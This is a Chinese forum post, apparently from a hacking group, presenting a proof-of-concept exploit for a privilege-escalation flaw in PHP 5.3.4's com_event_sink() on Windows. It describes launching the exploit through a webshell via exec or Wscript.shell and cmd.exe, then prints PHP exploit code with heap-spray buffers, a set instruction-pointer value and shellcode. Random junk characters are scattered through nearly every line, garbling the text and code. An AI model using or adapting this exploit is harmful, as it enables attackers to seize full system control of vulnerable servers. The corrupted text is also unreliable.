|
|
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中9 z& N0 ^2 J. q0 p6 x
3 `: J! G m$ M9 p
测试方法如下:cmd /c x:\php\php.exe x:\test.php8 ^0 ]1 t! s$ v# }7 m7 ]
! Q F' `9 G9 {9 C [5 a下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
/ }5 W% d/ {( a. n+ |+ E这里是两个测试的截图: L. c2 H/ ]" }1 x/ ?7 H R
2 Z I5 d* J" X" y; M) [0 A
3 z1 ?" W+ \- y0 ]( I, O( a
9 u' V! F) L' X+ o) a& f3 G# I3 g0 J( J
4 ~2 P! }: }4 W0 T. I
成功利用此漏洞的攻击者将获得系统的最高权限% \2 j' j0 Z1 h; h/ x% l; f, x( Z
" m/ J9 J( n5 }' ]1 n% ]9 b7 D2 d$ b& ^4 ?7 p# m
' J# A5 m0 @/ V ?/ n" `6 T! s- z1 H0 M; s
3 T3 X3 I1 |# h6 j: x
关于漏洞分析稍后附上。一下是PoC代码:# S6 q. `& z: v
8 `- L; @& D2 }+ Z
<?php
7 b* q( Y' {/ S/ n! D) B- r//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞
8 g/ ~( w# K* d6 e! H//$eip ="\x44\x43\x42\x41";2 M$ n% h3 \- Q: F. o' t
$eip= "\x4b\xe8\x57\x78";
/ c- @6 _" y. |, }7 x" g$eax ="\x80\x01\x8d\x04";; ~( u% {1 B; B" p
$deodrant="";5 h b8 B" k x# J H5 k% ~
$axespray = str_repeat($eip.$eax,0x80);
: U: P5 Q+ ^. n5 Z5 E: q2 a9 N0 f//048d0190 }/ e/ a2 B Z t
echo strlen($axespray);# n1 O3 V% y: g& h
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";' v; M+ P0 `* F- Y$ l$ M: q
echo "Silic Group Hacker Army - BlackBap.Org";
" i {$ X( c; I//19200 ==4B32 4b00
* ? E: [" T! B$ ~" p* ifor($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}* n7 J8 E' N5 | @
$terminate = "T";2 ]6 Y5 f! W5 b' X! y0 v6 u8 y
$u[] =$deodrant;
1 M+ r" J0 Z4 q! m7 A$r[] =$deodrant.$terminate;6 P) Y; ~8 T) P4 z4 F' p9 \
$a[] =$deodrant.$terminate;2 Q* e( t* `# C* b
$s[] =$deodrant.$terminate;4 Y, a* Z2 w) C( Z4 G9 y' {* u; d
//$vVar = new VARIANT(0x048d0038+$offset); 这里是可控可改的! ^( T, H' z0 A- M2 w, @1 {0 r
$vVar = new VARIANT(0x048d0000+180);
; S; \4 l- N" p8 d* Y//弹窗代码(Shellcode)
6 S% Z* w& n$ g6 O6 z! P( C! t& G$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";% x% F" ~- | P; i
$var2 = new VARIANT(0x41414242);: W0 E x. o7 \( @" Q3 \2 w
com_event_sink($vVar,$var2,$buffer); u: O4 T- H& V m3 N
?>4 h9 z6 G" t2 w: G- {: C
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|